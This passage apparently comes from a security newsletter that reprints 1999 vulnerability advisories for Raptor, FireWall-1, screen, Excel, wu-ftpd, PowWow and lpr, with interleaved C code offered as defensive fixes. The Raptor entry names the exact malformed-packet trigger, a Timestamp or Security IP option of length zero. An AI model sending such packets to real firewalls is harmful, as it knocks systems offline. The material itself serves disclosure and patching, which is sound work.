class        Failure to Handle Exceptional Conditions
cve          GENERIC-MAP-NOMATCH
remote       Yes
local        No
published    October 21, 1999
updated      October 21, 1999
vulnerable   Axent Raptor 6.0

It is possible to remotely lock Axent Raptor firewalls by sending them
packets with malformed IP options fields. According to an advisory posted to
bugtraq by the Purdue CERIAS labs, setting the SECURITY and TIMESTAMP IP
options length to 0 can cause an infinite loop to occur within the code that
handles the options (resulting in the software freezing). A consequence of
this is a remote denial of service.

Axent has released a hotfix for this problem which is available at:

ftp://ftp.raptor.com/patches/V6.0/6.02Patch/

credit

This was discovered by the CERIAS labs at Purdue (cs.purdue.edu) and posted
to BugTraq on October 21, 1999.
reference

message: Remote DoS in Axent's Raptor 6.0 (Mike Frantzen)

To:         BugTraq
Subject:    Remote DoS in Axent's Raptor 6.0
Date:       Wed Oct 20 1999 04:45:56
Author:     Mike Frantzen
Message-ID: <199910202245.RAA28104@expert.cc.purdue.edu>

This bug was discovered in the CERIAS labs at Purdue by:
    Florian Kerschbaum
    Mike Frantzen

Thanks to the Purdue CERIAS Firewall group:
    Stephanie Miller
    Florian Kerschbaum
    Mike Frantzen
    Eric Hlutke
    Hendry Lim

Environment:
    Sparc 5 85MHz
    Solaris 2.6 Generic_105181-12
    Axent Raptor 6.0.0 Firewall

Thesis:

Axent's Raptor programmers have a switch statement for IP Options in a
packet. They likely have cases for most of the options contained in the RFCs
but only wrote handling code for the commonly 'malused' options (source
routing). For all the other known options, they are handled by a generic
routine which likely tries to skip that option. See probable code snapshot
below.

Background:

IP Options are (generally) of the form:

    --------  --------  --------  --------
    |  Type  | Length |   ...  |   ...  |
    --------  --------  --------  --------

Where the Type indicates which IP Option is present and the Length obviously
indicates how long the option is. It also needs to be pointed out that there
can be multiple options inside an IP packet -- they just follow each other.

Problem:

IP Packets are parsed either with interrupts masked off or while holding a
vital global mutex. When the option parsing tries to skip a 'benign' option,
it forgets to check if it is of zero length. So the end result is
essentially:

    for (ecx = 20; ecx < header_length; ecx += 0 ) { ... }

The Options that can lock up the firewall are the Timestamp option and the
Security option. The copy bit does not appear to affect the results. Nor does
the underlying protocol (TCP, UDP or random).

Solution one: Learn to power cycle your firewall ;-)

Solution two: Block all traffic with IP Options at your screening router.
Solution three: Apply Axent's Hotfix
    ftp://ftp.raptor.com/patches/V6.0/6.02Patch/

Sidenote one: Axent received the bug and responded _swiftly_. I was extremely
impressed.

Sidenote two: Out of respect to the way Axent handled the bug (and the fact
they are a CERIAS Sponsor), we are not releasing an exploit.

This is the probable offending segment of code in Raptor. It is only an
educated guess--I have not seen their code nor have I disassembled it.

[.....]

/* Parse the IP Options of the packet */
for (c = 20; c < (ip.ip_hl * 4); ) {
    switch ( packet[c] & ~COPY_BIT ) {
    case TIMESTAMP:
    case SECURITY:
        if ( c + 1 > ip.ip_hl * 4 )
            goto done_parsing_label;
        option_length = packet[c + 1];
        /* ****************************** ****
         * Forgetting to check if the option length is
         * zero here. So you enter an infinite loop
         * ****************************** **** */
        if ( option_length + c > ip.ip_hl * 4 )
            goto done_parsing_label;
        c += option_length;
        break;

    case END_OF_OPTIONS:
        goto done_parsing_label;

    case NOP:
        c++;
        break;

    case STRICT_SOURCE_ROUTE:
    case LOOSE_SOURCE_ROUTE:
    case RECORD_ROUTE:
        log_dangerous_packet();
    default:
        if ( c + 1 >= ip.ip_hl * 4 )
            goto done_parsing_label;
        option_length = packet[c + 1];
        if ( (option_length == 0) || (option_length + c >= ip.ip_hl * 4) )
            goto done_parsing_label;
        c += option_length;
        break;
    }
}
done_parsing_label:
queue_packet_down_stack(packet);
unmask_interrupts();

[.....]
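The defensive version of that loop is one where every length-bearing option, not just the generic `default:` arm, is held to the same rule: a length below 2 can never be valid (the option occupies at least its type and length bytes), so the index always advances. The walker below is an added example written for this issue, not Raptor's code and not Mike Frantzen's sketch; the option numbers are the RFC 791 / RFC 1108 values, and the sample headers it checks (a zero-length Timestamp, a well-formed Security option, a NOP/NOP/Record Route sequence) are constructed here.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* IP option type byte: bit 7 is the copy flag, the low 7 bits name the
   option (class + number). Values from RFC 791 (and RFC 1108 for SEC). */
#define IPOPT_COPY_BIT 0x80
#define IPOPT_EOL      0x00   /* end of option list                   */
#define IPOPT_NOP      0x01   /* no operation: one byte, no length    */
#define IPOPT_SEC      0x02   /* security (130 on the wire, copy set) */
#define IPOPT_LSRR     0x03   /* loose source route (131)             */
#define IPOPT_RR       0x07   /* record route                         */
#define IPOPT_SSRR     0x09   /* strict source route (137)            */
#define IPOPT_TS       0x44   /* timestamp (68)                       */

#define OPTS_MALFORMED (-1)

/* Walk the options area of an IPv4 header (bytes 20 .. header_len-1).
   Returns the number of options seen, or OPTS_MALFORMED if an option is
   truncated or carries a length that can never be valid. *routed is set
   when a source-route or record-route option is present. The index is
   always advanced by at least one byte, so the loop is guaranteed to end. */
int walk_ip_options(const uint8_t *hdr, size_t header_len, int *routed)
{
    size_t c = 20;
    int count = 0;

    *routed = 0;
    /* IHL is a 4-bit count of 32-bit words: 20..60 bytes, multiple of 4. */
    if (header_len < 20 || header_len > 60 || (header_len % 4) != 0)
        return OPTS_MALFORMED;

    while (c < header_len) {
        uint8_t type = hdr[c] & 0x7f;   /* drop the copy bit */
        uint8_t len;

        if (type == IPOPT_EOL)
            break;                      /* rest of the area is padding */
        if (type == IPOPT_NOP) {
            c++;
            count++;
            continue;
        }
        if (c + 1 >= header_len)        /* no room for a length byte */
            return OPTS_MALFORMED;
        len = hdr[c + 1];
        if (len < 2 || c + len > header_len)
            return OPTS_MALFORMED;      /* zero/one length, or past end */
        if (type == IPOPT_LSRR || type == IPOPT_SSRR || type == IPOPT_RR)
            *routed = 1;
        c += len;                       /* always >= 2, never stalls */
        count++;
    }
    return count;
}

/* Constructed sample header: 20 zeroed fixed bytes with IHL set to match,
   followed by the given option bytes (caller pads to a multiple of 4). */
static size_t sample_header(uint8_t *out, const uint8_t *opts, size_t optlen)
{
    size_t hlen = 20 + optlen;
    memset(out, 0, 60);
    out[0] = (uint8_t)(0x40 | (hlen / 4));   /* version 4, IHL in words */
    memcpy(out + 20, opts, optlen);
    return hlen;
}

/* Timestamp option whose length byte is `len`; 0 is the packet described
   in the post. Returns the walker's result. */
int demo_timestamp_with_length(uint8_t len)
{
    uint8_t opts[4] = { IPOPT_TS, len, 0x00, 0x00 };
    uint8_t hdr[60];
    int routed;
    return walk_ip_options(hdr, sample_header(hdr, opts, sizeof opts), &routed);
}

/* Security option (copy bit set, length 11) followed by EOL padding. */
int demo_valid_security_option(void)
{
    static const uint8_t opts[12] = { IPOPT_COPY_BIT | IPOPT_SEC, 11,
                                      0, 0, 0, 0, 0, 0, 0, 0, 0, IPOPT_EOL };
    uint8_t hdr[60];
    int routed;
    return walk_ip_options(hdr, sample_header(hdr, opts, sizeof opts), &routed);
}

/* NOP, NOP, minimal record route (type, length 3, pointer 4), then EOL. */
int demo_record_route(int *routed)
{
    static const uint8_t opts[8] = { IPOPT_NOP, IPOPT_NOP, IPOPT_RR, 3, 4,
                                     IPOPT_EOL, 0, 0 };
    uint8_t hdr[60];
    return walk_ip_options(hdr, sample_header(hdr, opts, sizeof opts), routed);
}
```

The zero-length Timestamp header returns OPTS_MALFORMED on the first option instead of spinning, a Timestamp whose length overruns the header is rejected the same way, and the well-formed Security and Record Route samples are counted normally.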
@HWA

66.0 RedHat screen pty(7) Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bugtraq id     732
object         screen (exec)
class          Origin Validation Error
cve            GENERIC-MAP-NOMATCH
remote         No
local          Yes
published      October 21, 1999
updated        October 21, 1999
vulnerable     RedHat Linux 6.1
not vulnerable RedHat Linux 6.0.0
               RedHat Linux 5.2.0
               RedHat Linux 5.1.0
               RedHat Linux 5.0.0
               RedHat Linux 4.2.0
               RedHat Linux 4.1.0
               RedHat Linux 4.0.0
               RedHat Linux 3.0.3
               RedHat Linux 2.1.0
               RedHat Linux 2.0.0

The version of screen which ships with Redhat Linux 6.1 sets incorrect
permissions on the pty (pseudo-terminal driver). The pty driver provides
support for a pair of devices collectively known as a pseudo-terminal. The
two devices comprising a pseudo-terminal are known as a controller and a
slave. Instead of having a hardware interface and associated hardware that
supports the terminal functions, the functions are implemented by another
process manipulating the controller device of the pseudo-terminal. These ptys
are represented as regular files on the UNIX filesystem.

As a result of poor permission settings, these ptys are world writable, thus
allowing other users to hijack other users' ptys and execute commands as the
user whose pty has been stolen. This can result in root privileges if 'root'
is running the vulnerable version of screen.

Redhat has made the following RPMS available which address this problem:

Red Hat Linux 6.1:

Intel: ftp://ftp.redhat.com/pub/redhat/updates/6.1/i386/screen-3.9.4-3.i386.rpm
Source package:
       ftp://ftp.redhat.com/pub/redhat/updates/6.1/SRPMS/screen-3.9.4-3.src.rpm

credit

This bug was discovered by Chris Evans and posted as a Redhat advisory
(RHSA-1999:042-01) to the Bugtraq mailing list by Bill Nottingham on Wed, 20
Oct 1999.
reference

advisory: RHSA-1999:042-01: screen defaults to not using Unix98 ptys (RedHat)
http://www.securityfocus.com/templates/advisory.html?id=1800
web page: Updates, Fixes, and Errata Page (RedHat)
http://www.redhat.com/corp/support/errata/index.html

@HWA

67.0 Microsoft Excel File Import Macro Execution Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bugtraq id   728
class        Design Error
cve          GENERIC-MAP-NOMATCH
remote       Unknown
local        Yes
published    October 20, 1999
updated      October 20, 1999
vulnerable   Microsoft Excel 97 SR2
             Microsoft Excel 97 SR1
             Microsoft Excel 97
               - Microsoft Windows 98
               - Microsoft Windows 95
               - Microsoft Windows NT 4.0
             Microsoft Office 97
               - Microsoft Windows 98
               - Microsoft Windows 95
               - Microsoft Windows NT 4.0

When a Lotus 1-2-3 or Quattro Pro file containing a macro is opened by Excel
97, the user is not warned that a macro will be executed upon opening the
file (as is customary when Excel opens other spreadsheet files containing
macros).

Microsoft has released a patch for this vulnerability. It is available at:

- Excel 97:   http://officeupdate.microsoft.com/downloadDetails/Xl8p7pkg.htm
- Excel 2000: http://officeupdate.microsoft.com/2000/downloadDetails/XL9p1pkg.htm

credit

The vulnerability was reported to Microsoft by David Young of Derby, UK.
reference

advisory: MS99-044: Patch Available for "Excel SYLK" Vulnerability (MS)
http://www.securityfocus.com/templates/advisory.html?id=1798
web page: Microsoft Security Bulletin MS99-044: Frequently Asked Questions (Microsoft)
http://www.microsoft.com/security/bulletins/MS99-044faq.asp
web page: Q241900: XL97: Opening Lotus 1-2-3 File May Execute Macro Without Warning (Microsoft)
http://support.microsoft.com/support/kb/articles/q241/9/00.asp

@HWA

68.0 Checkpoint Firewall-1 LDAP Authentication Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bugtraq id     725
class          Access Validation Error
cve            GENERIC-MAP-NOMATCH
remote         Yes
local          No
published      October 20, 1999
updated        October 20, 1999
vulnerable     Checkpoint Software Firewall-1 4.0
not vulnerable Checkpoint Software Firewall-1 3.0.0

With FireWall-1 Version 4.0 Checkpoint introduced support for the Lightweight
Directory Access Protocol (LDAP) for user authentication. It looks like
there's a bug in Checkpoint's ldap code which under certain circumstances can
lead to unauthorized access to protected systems behind the firewall.

A user can authenticate himself at the firewall providing a valid username
and password. The firewall acts as an ldap client, validating the credentials
against a directory server using the ldap protocol. After successful
authentication, access will be granted to systems protected by the firewall.

In contrast to authentication using the Radius or SecurID protocol, after
successful authentication the directory server can supply the firewall with
additional ldap attributes for the user, like the time and day of the week a
user is allowed to log in, the source addresses a user can run a client from,
or the system behind the firewall a user is allowed to access. This can be
done individually for each user.
In general I think that's a great idea, but it seems Checkpoint made
something wrong interpreting the ldap attribute 'fw1allowed-dst', which is
supposed to control in detail which protected network object a user can
access. It seems this attribute is ignored by the firewall software, granting
access to all protected network objects instead.

Example:

                         ------ Server 'Foo'
                        |
   Internet --- FW-1 ---|
                        |
                         ------ Server 'Bar'

Suppose there's a user 'Sid' with access only to Server 'Foo', and a second
user 'Nancy' with access restricted to Server 'Bar', both controlled by the
ldap protocol, using the ldap attribute 'fw1allowed-dst'. The bug will cause
both Sid and Nancy to have access to Foo and to Bar.

[Quoted from the post by Olaf Selke with permission]

credit

This vulnerability was posted to the Bugtraq mailing list by Olaf Selke on
Wed, 20 Oct 1999.

reference

web page: Firewall-1 Connection Table Paper (Lance Spitzner)
http://www.enteract.com/~lspitz/fwtable.html
web page: Checkpoint Technical Support (Checkpoint Software)
http://www.checkpoint.com/techsupport/
message: Checkpoint FireWall-1 V4.0: possible bug in LDAP authentication (Olaf Selke)
http://www.securityfocus.com/templates/archive.pike?list=1&msg=19991020150002.21047.qmail@tarjan.mediaways.net

To:         BugTraq
Subject:    Checkpoint FireWall-1 V4.0: possible bug in LDAP authentication
Date:       Wed Oct 20 1999 09:00:02
Author:     Olaf Selke
Message-ID: <19991020150002.21047.qmail@tarjan.mediaways.net>

Overview:

With FireWall-1 Version 4.0 Checkpoint introduced support for the Lightweight
Directory Access Protocol (LDAP) for user authentication. It looks like
there's a bug in Checkpoint's ldap code which under certain circumstances can
lead to unauthorized access to protected systems behind the firewall.

Technical background:

A user can authenticate himself at the firewall providing a valid username
and password.
The firewall acts as an ldap client, validating the credentials against a
directory server using the ldap protocol. After successful authentication,
access will be granted to systems protected by the firewall.

In contrast to authentication using the Radius or SecurID protocol, after
successful authentication the directory server can supply the firewall with
additional ldap attributes for the user, like the time and day of the week a
user is allowed to log in, the source addresses a user can run a client from,
or the system behind the firewall a user is allowed to access. This can be
done individually for each user.

In general I think that's a great idea, but it seems Checkpoint made
something wrong interpreting the ldap attribute 'fw1allowed-dst', which is
supposed to control in detail which protected network object a user can
access. It seems this attribute is ignored by the firewall software, granting
access to all protected network objects instead.

Example:

                         ------ Server 'Foo'
                        |
   Internet --- FW-1 ---|
                        |
                         ------ Server 'Bar'

Suppose there's a user 'Sid' with access only to Server 'Foo', and a second
user 'Nancy' with access restricted to Server 'Bar', both controlled by the
ldap protocol, using the ldap attribute 'fw1allowed-dst'. The bug will cause
both Sid and Nancy to have access to Foo and to Bar.

Conclusion:

I don't consider it a major bug, but it's serious enough that one can't rely
on access control enforced through ldap. I've reported this problem through
Checkpoint's support channels two weeks ago, but so far there's no response
at all. Attached is the original bug report I've sent to technical support.
Olaf
--
Olaf Selke, olaf.selke@mediaways.net, voice +49 5241 80-7069

=============================== snip ===============================

firewall:           Solaris 2.6, V4.0 SP4 [VPN + DES + STRONG]
management machine: Solaris 2.6, V4.0 SP4 [VPN + DES + STRONG]
Directory Server:   Solaris 7, Netscape-Directory/4.0 B98.349.0339

Today we found that FW-1 seems to ignore the ldap attribute 'fw1allowed-dst'
completely, granting access to 'any' instead. If that's really the case, it
could lead to a breach of security.

We successfully coupled a FW-1 V4.0 SP4 with a Netscape Directory Server
according to CP's documentation. Surprisingly this went very smoothly ;-)

In a second step we checked if the FW software really cares about the ldap
attributes controlling access in detail, using a client authentication rule
for this purpose. It looks like the attributes 'fw1hour-range-from',
'fw1hour-range-to', and 'fw1allowed-src' are interpreted as expected by the
firewall, so I think we didn't make some mistake in general. However, from
our point of view, in any case the ldap attribute 'fw1allowed-dst' is ignored
and silently substituted by 'any'. This means a user with restricted access
through ldap attributes has full access after successful authentication.
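The test Olaf describes (log in as a restricted user, then try an object outside 'fw1allowed-dst') is easy to turn into an acceptance check that any directory-backed authorizer must pass. The code below is an added example, not Check Point's implementation or Olaf's script: it models the four attributes named in the report as a per-user record, shows the reported behaviour (destination silently treated as 'any') beside the expected one, and runs both against the Sid/Nancy policy from the post. The 'any' wildcard semantics, the inclusive hour range, the directory contents and the client addresses are all constructed assumptions.

```c
#include <string.h>
#include <stddef.h>

/* Per-user attributes as the firewall would read them from the directory.
   Attribute names are from the report; "any" is assumed to be the wildcard
   and the hour range is assumed inclusive. Constructed example. */
struct fw1_user {
    const char *name;
    const char *allowed_src;   /* fw1allowed-src     */
    const char *allowed_dst;   /* fw1allowed-dst     */
    int hour_from;             /* fw1hour-range-from */
    int hour_to;               /* fw1hour-range-to   */
};

static int matches(const char *attr, const char *value)
{
    return strcmp(attr, "any") == 0 || strcmp(attr, value) == 0;
}

/* Behaviour the report describes: source and hours are honoured, but
   fw1allowed-dst is ignored as if it were "any". */
int fw1_authorize_as_reported(const struct fw1_user *u, const char *src,
                              const char *dst, int hour)
{
    (void)dst;   /* the destination never enters the decision */
    return hour >= u->hour_from && hour <= u->hour_to &&
           matches(u->allowed_src, src);
}

/* Expected behaviour: every attribute is part of the decision. */
int fw1_authorize(const struct fw1_user *u, const char *src,
                  const char *dst, int hour)
{
    return hour >= u->hour_from && hour <= u->hour_to &&
           matches(u->allowed_src, src) &&
           matches(u->allowed_dst, dst);
}

/* Constructed directory entries for the report's two example users. */
static const struct fw1_user directory[] = {
    { "Sid",   "any", "Foo", 0, 23 },
    { "Nancy", "any", "Bar", 0, 23 },
};

const struct fw1_user *lookup_user(const char *name)
{
    size_t i;
    for (i = 0; i < sizeof directory / sizeof directory[0]; i++)
        if (strcmp(directory[i].name, name) == 0)
            return &directory[i];
    return NULL;
}

/* Acceptance check to run after enabling LDAP authentication: each user
   must reach their own object and must NOT reach the other one. Returns 1
   when the authorizer under test enforces the policy, 0 if it leaks. */
int policy_holds(int (*authorize)(const struct fw1_user *, const char *,
                                  const char *, int))
{
    const struct fw1_user *sid = lookup_user("Sid");
    const struct fw1_user *nancy = lookup_user("Nancy");

    if (sid == NULL || nancy == NULL)
        return 0;
    return  authorize(sid,   "10.0.0.5", "Foo", 12) &&
           !authorize(sid,   "10.0.0.5", "Bar", 12) &&
            authorize(nancy, "10.0.0.6", "Bar", 12) &&
           !authorize(nancy, "10.0.0.6", "Foo", 12);
}
```

Run against the expected authorizer the check passes; run against the reported behaviour it fails on the negative cases, which is exactly the symptom in the bug report and the reason a positive-only login test would have missed it.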
@HWA

69.0 Microsoft Excel SYLK Macro Execution Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bugtraq id   727
class        Design Error
cve          GENERIC-MAP-NOMATCH
remote       No
local        Yes
published    October 20, 1999
updated      October 20, 1999
vulnerable   Microsoft Excel 97 SR2
             Microsoft Excel 97 SR1
             Microsoft Excel 97
               - Microsoft Windows 98
               - Microsoft Windows 95
               - Microsoft Windows NT 4.0
             Microsoft Excel 2000
             Microsoft Office 97
               - Microsoft Windows 98
               - Microsoft Windows 95
               - Microsoft Windows NT 4.0
             Microsoft Office 2000

When a symbolic link (SYLK) file containing a macro is opened by Excel 97 or
Excel 2000, the user is not warned that a macro will be executed upon opening
the file (as is customary when Excel opens other spreadsheet files containing
macros). SYLK files are basic ASCII files that can be read by a variety of
applications, including word processors and other spreadsheet applications.
SYLK files can be created using the "Save As" function in Microsoft Excel.

Microsoft has released a patch for this vulnerability. It is available at:

- Excel 97:   http://officeupdate.microsoft.com/downloadDetails/Xl8p7pkg.htm
- Excel 2000: http://officeupdate.microsoft.com/2000/downloadDetails/XL9p1pkg.htm

credit

The vulnerability was reported to Microsoft by David Young of Derby, UK.
reference

advisory: MS99-044: Patch Available for "Excel SYLK" Vulnerability (MS)
http://www.securityfocus.com/templates/advisory.html?id=1798
web page: Microsoft Security Bulletin MS99-044: Frequently Asked Questions (Microsoft)
http://www.microsoft.com/security/bulletins/MS99-044faq.asp
web page: Q241901: XL2000: Macro Virus Warning Does Not Appear Opening SYLK File (Microsoft)
http://support.microsoft.com/support/kb/articles/q241/9/01.asp
web page: Q241902: XL97: Macro Virus Warning Does Not Appear Opening SYLK File (Microsoft)
http://support.microsoft.com/support/kb/articles/q241/9/02.asp

@HWA

70.0 Wu-ftpd message Buffer Overflow Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bugtraq id     726
class          Boundary Condition Error
cve            GENERIC-MAP-NOMATCH
remote         Yes
local          No
published      October 19, 1999
updated        October 20, 1999
vulnerable     Washington University wu-ftpd 2.5
               + RedHat Linux 6.1
not vulnerable Washington University wu-ftpd 2.6.0

There is a buffer overflow in wu-ftpd message file expansions which may be
remotely exploitable. In situations where the message file can be written to
in some way remotely by regular or anonymous users, this may result in a root
compromise. This is detailed in AUSCERT advisory AA-1999.01.

Upgrade to the newest version of wu-ftpd not vulnerable to this problem
(2.6.0 as of Oct 20, 1999), available at the location below:

ftp://ftp.wu-ftpd.org/pub/wu-ftpd/

credit

Exposed in AusCERT advisory AA-1999.02, published on October 19, 1999.
reference

advisory: CA-99-13: Multiple Vulnerabilities in WU-FTPD (CERT)
http://www.securityfocus.com/templates/advisory.html?id=1797
advisory: AA-99.02: Multiple Vulnerabilities in wu-ftpd based daemons (AusCERT)
http://www.securityfocus.com/templates/advisory.html?id=1799
advisory: RHSA-1999:043-01: Security problems in WU-FTPD (RedHat)
http://www.securityfocus.com/templates/advisory.html?id=1801

@HWA

71.0 Tribal Voice PowWow Password Vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bugtraq id   724
class        Unknown
cve          GENERIC-MAP-NOMATCH
remote       Yes
local        Yes
published    October 19, 1999
updated      October 19, 1999
vulnerable   Tribal Voice PowWow 3.73
               - Microsoft Windows 98
               - Microsoft Windows 95
               - Microsoft Windows NT 4.0

PowWow is a network communications tool by Tribal Voice, similar to ICQ or
AOL Instant Messenger. PowWow contains several vulnerabilities whereby a
user's PowWow password can be obtained by an attacker.

The first vulnerability involves the powwow.ini file, where a user's name and
password are stored in plaintext. This file can be found at
C:\windows\powwow.ini on Win9x platforms and at C:\winnt\powwow.ini on NT
machines. The entries look like this:

LOCALNAME:user @ server.com
LOCALPASS:user's_password

The second vulnerability is related to how PowWow transmits the password to
the PowWow server to authenticate the user in various operations, mostly
related to listings in the PowWow white pages. The password is sent via the
URL, in plaintext, meaning it is visible in the address bar or (later) the
history list of the browser being used, as well as via sniffing at any
intermediary point on the network. For example, the URL used to remove
oneself from the White Pages listing is:

http ://ww2.tribal.com/white_pages/RemoveWpfromPow.cfm?PowID=user @ server.com&Pswd=user's_password

The third vulnerability is in Tribal Voice's free email service for PowWow
users.
During the sign-up process, the user's password is displayed back to them in
a web page, which once again can be viewed by anyone in the vicinity or
retrieved via sniffing or the browser's local cache.

Also, this free email service offers the option of logging into a POP server
elsewhere as the user, retrieving your mail, and presenting it to you in your
PowWow inbox. To do this, you enter the details of your POP account into a
web form at Tribal Voice, and they store them on the server for later use.
This means that the user's password is stored remotely (encryption/security
practices unknown), which leads to two problems:

1) If the Tribal Voice server is compromised, all users using this option
   could have their POP accounts elsewhere compromised as well.

2) Attackers could use this service to remotely access POP accounts they have
   hacked/obtained, with an added level of anonymity.

Tribal Voice has claimed that the powwow.ini issue will be fixed in a future
release of the product. Password storage can be disabled via the preferences
button in the program (default is On).

credit
  Original information submitted to Security Focus by Jim Williams.
  Additional research by Ben Greenbaum of Security Focus.

reference
  web page: Tribal Voice Homepage (Tribal Voice)
    http://www.tribal.com/

@HWA

72.0 RedHat lpr/lpd Vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bugtraq id  718
object      lpr and lpd (exec)
class       Race Condition Error
cve         GENERIC-MAP-NOMATCH
remote      No
local       Yes
published   October 18, 1999
updated     October 18, 1999
vulnerable  RedHat Linux 6.1
            RedHat Linux 6.0
            RedHat Linux 5.2
            RedHat Linux 5.1
            RedHat Linux 5.0
            RedHat Linux 4.2
            RedHat Linux 4.1
            RedHat Linux 4.0

The lpr packages that ship with RedHat Linux releases 4.x to 6.1 contain
vulnerabilities which may allow printing of files for which read access is
not allowed. The first of the two problems is a race condition that can be
exploited between the access checking and the opening of the file.
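Both lpr problems, the access-check/open race just described and the lpr -s
symlink variant the entry goes on to describe, come down to a root process
deciding on a path name and then acting on whatever that name resolves to a
moment later. The C below is an added example, not Red Hat's or lpr's code:
it puts the racy shape next to a hardened one that opens first, refuses
symlinks, and applies the permission test to the descriptor it actually
holds. The scratch path under /tmp and the "other user" uid/gid are
constructed for the demonstration.

```c
/* Added example (not Red Hat's or lpr's code): the check-then-open race
 * behind RHSA-1999:041-01, next to a hardened version.  A root spooler that
 * does
 *     if (access(path, R_OK) == 0) fd = open(path, O_RDONLY);
 * can be raced, because nothing ties the inode access() examined to the one
 * open() later returns.  Opening first and testing the descriptor with
 * fstat() removes the window, and O_NOFOLLOW refuses the symlink trick used
 * via "lpr -s".  (Dropping root with seteuid() around the open is the other
 * classic fix; it is not shown here.) */
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Classic Unix read-permission test for the *submitting* user (uid, gid),
 * evaluated on an inode we already hold open.  Supplementary groups are
 * ignored for brevity; only regular files are printable. */
int user_may_read(const struct stat *st, uid_t uid, gid_t gid)
{
    if (!S_ISREG(st->st_mode))
        return 0;
    if (st->st_uid == uid)
        return (st->st_mode & S_IRUSR) != 0;
    if (st->st_gid == gid)
        return (st->st_mode & S_IRGRP) != 0;
    return (st->st_mode & S_IROTH) != 0;
}

/* Racy shape, for contrast only: permission is checked by name, then the
 * file is opened by name, and the two lookups may hit different objects. */
int open_racy(const char *path)
{
    if (access(path, R_OK) != 0)
        return -1;
    return open(path, O_RDONLY);
}

/* Hardened: open without following symlinks, then decide on the descriptor.
 * Returns an fd the caller owns, or -1 with errno set (EACCES when the user
 * may not read the file, ELOOP when the path was a symlink). */
int open_checked(const char *path, uid_t uid, gid_t gid)
{
    struct stat st;
    int fd = open(path, O_RDONLY | O_NOFOLLOW);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0) {
        int saved = errno;
        close(fd);
        errno = saved;
        return -1;
    }
    if (!user_may_read(&st, uid, gid)) {
        close(fd);
        errno = EACCES;
        return -1;
    }
    return fd;
}

/* Self-contained demonstration on a constructed fixture: a 0600 scratch file
 * and a symlink to it under /tmp.  Returns 0 when every case behaves as
 * intended, otherwise one bit per failed case (0xff if the fixture could not
 * be built). */
int demo_lpr_checks(void)
{
    char file[] = "/tmp/lpr-demo-XXXXXX";
    char link[sizeof file + 8];
    int fd, failed = 0;
    uid_t me = getuid();
    gid_t mygrp = getgid();

    fd = mkstemp(file);                     /* created mode 0600, owned by us */
    if (fd < 0)
        return 0xff;
    close(fd);
    snprintf(link, sizeof link, "%s.lnk", file);
    if (symlink(file, link) != 0) {
        unlink(file);
        return 0xff;
    }

    fd = open_checked(file, me, mygrp);     /* owner of a 0600 file: allowed */
    if (fd < 0) failed |= 1; else close(fd);

    fd = open_checked(file, me + 1, mygrp + 1); /* constructed other user: denied */
    if (fd >= 0) { failed |= 2; close(fd); }
    else if (errno != EACCES) failed |= 2;

    fd = open_checked(link, me, mygrp);     /* symlink route: refused outright */
    if (fd >= 0) { failed |= 4; close(fd); }
    else if (errno != ELOOP && errno != EMLINK) failed |= 4; /* BSDs use EMLINK */

    unlink(link);
    unlink(file);
    return failed;
}

int main(void)
{
    int rc = demo_lpr_checks();
    printf("lpr-style open checks: %s (code %d)\n", rc == 0 ? "ok" : "FAILED", rc);
    return rc != 0;
}
```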
The second is a symlink attack that could also be used to print files that
normally cannot be read by a regular user (through lpr -s).

Patched versions of the lpr packages are available at the links listed below:

Red Hat Linux 4.x:
  Intel:  ftp://ftp.redhat.com/pub/redhat/updates/4.2/i386/lpr-0.43-0.4.2.i386.rpm
  Alpha:  ftp://ftp.redhat.com/pub/redhat/updates/4.2/alpha/lpr-0.43-0.4.2.alpha.rpm
  Sparc:  ftp://ftp.redhat.com/pub/redhat/updates/4.2/sparc/lpr-0.43-0.4.2.sparc.rpm
  Source packages:
          ftp://ftp.redhat.com/pub/redhat/updates/4.2/SRPMS/lpr-0.43-0.4.2.src.rpm

Red Hat Linux 5.x:
  Intel:  ftp://ftp.redhat.com/pub/redhat/updates/5.2/i386/lpr-0.43-0.5.2.i386.rpm
  Alpha:  ftp://ftp.redhat.com/pub/redhat/updates/5.2/alpha/lpr-0.43-0.5.2.alpha.rpm
  Sparc:  ftp://ftp.redhat.com/pub/redhat/updates/5.2/sparc/lpr-0.43-0.5.2.sparc.rpm
  Source packages:
          ftp://ftp.redhat.com/pub/redhat/updates/5.2/SRPMS/lpr-0.43-0.5.2.src.rpm

Red Hat Linux 6.x:
  Intel:  ftp://ftp.redhat.com/pub/redhat/updates/6.1/i386/lpr-0.43-2.i386.rpm
  Alpha:  ftp://ftp.redhat.com/pub/redhat/updates/6.0/alpha/lpr-0.43-2.alpha.rpm
  Sparc:  ftp://ftp.redhat.com/pub/redhat/updates/6.0/sparc/lpr-0.43-2.sparc.rpm
  Source packages:
          ftp://ftp.redhat.com/pub/redhat/updates/6.1/SRPMS/lpr-0.43-2.src.rpm

The MD5 sums for each of these packages are available in the advisory linked
to from the references section.

credit
  Released in RedHat advisory RHSA-1999:041-01 on October 17, 1999.

reference
  advisory: RHSA-1999:041-01: File access problems in lpr/lpd (RedHat)
    http://www.securityfocus.com/templates/advisory.html?id=1792
  web page: Updates, Fixes, and Errata Page (RedHat)
    http://www.redhat.com/corp/support/errata/index.html

RHSA-1999:041-01: File access problems in lpr/lpd
Published: Sun Oct 17 1999
Updated:   Mon Oct 18 1999

---------------------------------------------------------------------
                   Red Hat, Inc.
                   Security Advisory

Synopsis:          File access problems in lpr/lpd
Advisory ID:       RHSA-1999:041-01
Issue date:        1999-10-17
Updated on:
Keywords:          lpr lpd permissions
Cross references:
---------------------------------------------------------------------

1. Topic:

